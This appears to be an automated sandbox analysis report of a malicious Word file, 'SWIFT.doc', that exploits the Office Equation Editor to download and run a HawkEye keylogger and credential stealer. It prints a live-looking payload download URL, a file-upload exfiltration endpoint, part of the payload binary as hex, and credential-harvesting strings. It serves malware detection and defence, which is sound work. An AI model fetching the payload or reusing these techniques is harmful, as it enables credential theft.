Play interactive tour

Edit tour

Analysis Report SWIFT.doc

Overview

General Information

Sample Name:	SWIFT.doc
Analysis ID:	330287
MD5:	516028d299e8b6b9f947fdb4541a5d7e
SHA1:	fa9c3d41dcd61c1dcade0ba7943882cf640a71cd
SHA256:	6de5a6a916916823583495dae424fa8ce2f54c33f2a67da83337b6f2579e816c
Tags:	doc
Most interesting Screenshot:

Detection

HawkEye M00nD3v Logger MailPassView

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Detected HawkEye Rat

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Sigma detected: Droppers Exploiting CVE-2017-11882

Sigma detected: EQNEDT32.EXE connecting to internet

Yara detected AntiVM_3

Yara detected HawkEye Keylogger

Yara detected M00nD3v Logger

Yara detected MailPassView

.NET source code contains potential unpacker

.NET source code references suspicious native API functions

Allocates memory in foreign processes

Drops PE files with a suspicious file extension

Injects a PE file into a foreign processes

Office equation editor drops PE file

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sample uses process hollowing technique

Searches for Windows Mail specific files

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Instant Messenger accounts or passwords

Tries to steal Mail credentials (via file access)

Tries to steal Mail credentials (via file registry)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Antivirus or Machine Learning detection for unpacked file

Contains functionality for read data from the clipboard

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Downloads executable code via HTTP

Drops PE files

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Office Equation Editor has been started

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Startup

System is w7x64

WINWORD.EXE (PID: 2312 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)

EQNEDT32.EXE (PID: 2488 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

izux978537.scr (PID: 2668 cmdline: C:\Users\user\AppData\Roaming\izux978537.scr MD5: 7DA4F5E17791A774131C3C97538A2495)

izux978537.scr (PID: 2308 cmdline: C:\Users\user\AppData\Roaming\izux978537.scr MD5: 7DA4F5E17791A774131C3C97538A2495)

izux978537.scr (PID: 3016 cmdline: C:\Users\user\AppData\Roaming\izux978537.scr MD5: 7DA4F5E17791A774131C3C97538A2495)

vbc.exe (PID: 1492 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2915.tmp' MD5: 1672D0478049ABDAF0197BE64A7F867F)

vbc.exe (PID: 948 cmdline: 'C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe' /stext 'C:\Users\user\AppData\Local\Temp\tmp2916.tmp' MD5: 1672D0478049ABDAF0197BE64A7F867F)

EQNEDT32.EXE (PID: 2976 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)

cleanup

Malware Configuration

Threatname: HawkEye

{"Modules": ["mailpv"], "Version": ""}

Yara Overview

Memory Dumps

Source	Rule	Description	Author	Strings
00000009.00000002.2378186428.0000000002D68000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000003.2226541368.0000000004335000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2376684630.0000000002C3A000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x134d2:$a1: logins.json 0x13432:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13c56:$s4: \mozsqlite3.dll 0x124c6:$s5: SMTP Password
00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2376638694.0000000002C1E000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	JoeSecurity_M00nD3vLogger	Yara detected M00nD3v Logger	Joe Security
0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2378260409.0000000003B31000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x6138:$s2: _ScreenshotLogger 0x66c4:$s2: _ScreenshotLogger 0x60d0:$s3: _PasswordStealer 0x665c:$s3: _PasswordStealer
00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x92f42:$s1: HawkEye Keylogger 0x92fa7:$s1: HawkEye Keylogger 0x8bb6a:$s2: _ScreenshotLogger 0x8bb02:$s3: _PasswordStealer
00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
00000009.00000002.2378154261.0000000002D45000.00000004.00000001.sdmp	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: vbc.exe PID: 1492	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: vbc.exe PID: 948	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: izux978537.scr PID: 3016	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x3f4ea9:$s2: _ScreenshotLogger 0x407f2c:$s2: _ScreenshotLogger 0x4085fb:$s2: _ScreenshotLogger 0x408f27:$s2: _ScreenshotLogger 0x409b5d:$s2: _ScreenshotLogger 0x3f4df9:$s3: _PasswordStealer 0x407e7c:$s3: _PasswordStealer 0x40854b:$s3: _PasswordStealer 0x408e77:$s3: _PasswordStealer 0x409a77:$s3: _PasswordStealer
Process Memory Space: izux978537.scr PID: 3016	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: izux978537.scr PID: 3016	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
Process Memory Space: izux978537.scr PID: 3016	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
Process Memory Space: izux978537.scr PID: 3016	JoeSecurity_M00nD3vLogger	Yara detected M00nD3v Logger	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.2.vbc.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
11.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.2.vbc.exe.400000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x147b0:$a1: logins.json 0x14710:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x14f34:$s4: \mozsqlite3.dll 0x137a4:$s5: SMTP Password
10.2.vbc.exe.400000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
9.2.izux978537.scr.2c0000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x116d2:$a1: logins.json 0x11632:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x11e56:$s4: \mozsqlite3.dll 0x106c6:$s5: SMTP Password
9.2.izux978537.scr.2c0000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
9.2.izux978537.scr.2c0000.0.raw.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x134d2:$a1: logins.json 0x13432:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13c56:$s4: \mozsqlite3.dll 0x124c6:$s5: SMTP Password
9.2.izux978537.scr.2c0000.0.raw.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
11.2.vbc.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
11.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
10.2.vbc.exe.400000.0.unpack	APT_NK_BabyShark_KimJoingRAT_Apr19_1	Detects BabyShark KimJongRAT	Florian Roth	0x131b0:$a1: logins.json 0x13110:$s3: SELECT id, hostname, httpRealm, formSubmitURL, usernameField, passwordField, encryptedUsername, encryptedPassword FROM moz_login 0x13934:$s4: \mozsqlite3.dll 0x121a4:$s5: SMTP Password
10.2.vbc.exe.400000.0.unpack	JoeSecurity_MailPassView	Yara detected MailPassView	Joe Security
9.2.izux978537.scr.400000.1.unpack	MAL_HawkEye_Keylogger_Gen_Dec18	Detects HawkEye Keylogger Reborn	Florian Roth	0x93142:$s1: HawkEye Keylogger 0x931a7:$s1: HawkEye Keylogger 0x8bd6a:$s2: _ScreenshotLogger 0x8bd02:$s3: _PasswordStealer
9.2.izux978537.scr.400000.1.unpack	JoeSecurity_HawkEye	Yara detected HawkEye Keylogger	Joe Security
9.2.izux978537.scr.400000.1.unpack	HawkEyev9	HawkEye v9 Payload	ditekshen	0x8bd02:$str1: _PasswordStealer 0x8bd28:$str2: _KeyStrokeLogger 0x8bd6a:$str3: _ScreenshotLogger 0x8bd49:$str4: _ClipboardLogger 0x8bd7c:$str5: _WebCamLogger 0x8be91:$str6: _AntiVirusKiller 0x8be7f:$str7: _ProcessElevation 0x8be46:$str8: _DisableCommandPrompt 0x8bf4c:$str9: _WebsiteBlocker 0x8bf5c:$str9: _WebsiteBlocker 0x8be32:$str10: _DisableTaskManager 0x8bead:$str11: _AntiDebugger 0x8bf37:$str12: _WebsiteVisitorSites 0x8be5c:$str13: _DisableRegEdit 0x8bebb:$str14: _ExecutionDelay 0x8bde0:$str15: _InstallStartupPersistance
Click to see the 10 entries

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882

Show sources

Source: Process started

Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\izux978537.scr, CommandLine: C:\Users\user\AppData\Roaming\izux978537.scr, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\izux978537.scr, NewProcessName: C:\Users\user\AppData\Roaming\izux978537.scr, OriginalFileName: C:\Users\user\AppData\Roaming\izux978537.scr, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 2488, ProcessCommandLine: C:\Users\user\AppData\Roaming\izux978537.scr, ProcessId: 2668

Sigma detected: EQNEDT32.EXE connecting to internet

Show sources

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 46.173.221.33, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 2488, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49167

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://mangero.ga/izux/hktestfile.scr

Avira URL Cloud: Label: malware

Found malware configuration

Show sources

Source: vbc.exe.1492.10.memstr

Malware Configuration Extractor: HawkEye {"Modules": ["mailpv"], "Version": ""}

Multi AV Scanner detection for submitted file

Show sources

Source: SWIFT.doc	Virustotal: Detection: 44%			Perma Link
Source: SWIFT.doc	ReversingLabs: Detection: 47%

Source: 9.2.izux978537.scr.400000.1.unpack

Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Users\user\AppData\Roaming\izux978537.scr

Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Directory queried: number of queries: 1002

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040702D FindFirstFileA,FindNextFileA,strlen,strlen,

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Caches\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	File opened: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 4x nop then mov ecx, dword ptr [ebp-38h]
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 4x nop then jmp 00600DDFh
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 4x nop then jmp 00600DDFh

Source: global traffic

DNS query: name: mangero.ga

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 46.173.221.33:80

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.16.1Date: Mon, 14 Dec 2020 16:49:33 GMTContent-Length: 7447752Connection: keep-aliveLast-Modified: Mon, 14 Dec 2020 05:14:33 GMTETag: "71a4c8-5b665b7b1b004"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 02 00 f0 b4 d6 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 88 71 00 00 02 00 00 00 00 00 00 0e a6 71 00 00 20 00 00 00 c0 71 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 71 00 00 02 00 00 9a 75 72 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b4 a5 71 00 57 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8c 71 00 c8 18 00 00 00 c0 71 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 14 86 71 00 00 20 00 00 00 88 71 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 71 00 00 02 00 00 00 8a 71 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 a5 71 00 00 00 00 00 48 00 00 00 02 00 05 00 08 00 71 00 ac a5 00 00 03 00 00 00 02 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 2a 1a 20 00 00 00 00 2a fa fe 09 01 00 39 30 00 00 00 28 09 00 00 06 39 18 00 00 00 fe 09 00 00 72 f6 5a 00 70 fe 09 01 00 28 1c 00 00 0a 28 1d 00 00 0a 2a fe 09 00 00 fe 09 01 00 28 14 00 00 0a 2a fe 09 00 00 2a 66 fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 02 20 00 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 05 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 06 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 07 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 08 00 00 00 fe 01 2a 4a fe 09 00 00 20 0f 00 00 00 5f 20 0a 00 00 00 fe 01 2a 4a fe 09 00 00 20 40 00 00 00 5f 20 40 00 00 00 fe 01 2a 4a fe 09 00 00 20 10 00 00 00 5f 20 10 00 00 00 fe 01 2a a6 7f f6 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 25 00 00 06 73 2d 00 00 0a 80 f6 00 00 04 7f f6 00 00 04 28 0f 00 00 0a 2a a6 7f f7 00 00 04 28 0e 00 00 0a 3a 0f 00 00 00 28 26 00 00 06 73 2d 00 00 0a 80 f7 00 00 04 7f f7 00 00 04 28 0f 00 00 0a 2a 1a 28 10 00 00 0a 2a 76 28 23 00 00 06 39 0d 0

Source: Joe Sandbox View

ASN Name: GPI-ASRU GPI-ASRU

Source: global traffic

HTTP traffic detected: GET /izux/hktestfile.scr HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: mangero.gaConnection: Keep-Alive

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1A2D0E25-5575-4F65-9737-3BA52E43A74D}.tmp

Jump to behavior

Source: global traffic

Source: unknown

DNS traffic detected: queries for: mangero.ga

Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: http://bot.whatismyipaddress.com/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: hktestfile[1].scr.2.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: hktestfile[1].scr.2.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: http://dyn.com/dns/
Source: hktestfile[1].scr.2.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.php
Source: izux978537.scr, 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.php&https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: http://pomf.cat/upload.phpCContent-Disposition:
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	String found in binary or memory: http://treyresearch.net
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	String found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
Source: izux978537.scr, 00000009.00000002.2379604509.000000000A600000.00000002.00000001.sdmp	String found in binary or memory: http://www.iis.fhg.de/audioPA
Source: vbc.exe, 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp	String found in binary or memory: http://www.nirsoft.net/
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: https://a.pomf.cat/
Source: izux978537.scr, 00000009.00000002.2375869139.0000000002B31000.00000004.00000001.sdmp, izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll
Source: izux978537.scr, 00000009.00000002.2375979476.0000000002B5B000.00000004.00000001.sdmp	String found in binary or memory: https://m00nd3v.com/M00nD3v/HawkEyeDecrypt/BouncyCastle.Crypto.dll;HawkEye
Source: hktestfile[1].scr.2.dr	String found in binary or memory: https://sectigo.com/CPS0D

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected HawkEye Keylogger

Show sources

Source: Yara match	File source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY
Source: Yara match	File source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe

Code function: 10_2_0040ADA4 GetTempPathA,GetWindowsDirectoryA,GetTempFileNameA,OpenClipboard,GetLastError,DeleteFileA,

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000009.00000002.2371163613.00000000002C0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 0000000A.00000002.2248711261.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 00000009.00000002.2376075790.0000000002B90000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 00000009.00000002.2371242328.0000000000402000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 0000000B.00000002.2242831512.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: Process Memory Space: izux978537.scr PID: 3016, type: MEMORY	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.2c0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 11.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 10.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects BabyShark KimJongRAT Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects HawkEye Keylogger Reborn Author: Florian Roth
Source: 9.2.izux978537.scr.400000.1.unpack, type: UNPACKEDPE	Matched rule: HawkEye v9 Payload Author: ditekshen

Office equation editor drops PE file

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Roaming\izux978537.scr			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\hktestfile[1].scr			Jump to dropped file

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76E20000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe	Memory allocated: 76D20000 page execute and read and write

Source: C:\Users\user\AppData\Roaming\izux978537.scr

Code function: 9_2_00B13CB0 NtUnmapViewOfSection,

Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_0024C838
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_00241108
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002489A8
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002419B1
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002499F9
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002432B0
Source: C:\Users\user\AppData\Roaming\izux978537.scr	Code function: 9_2_002482F0
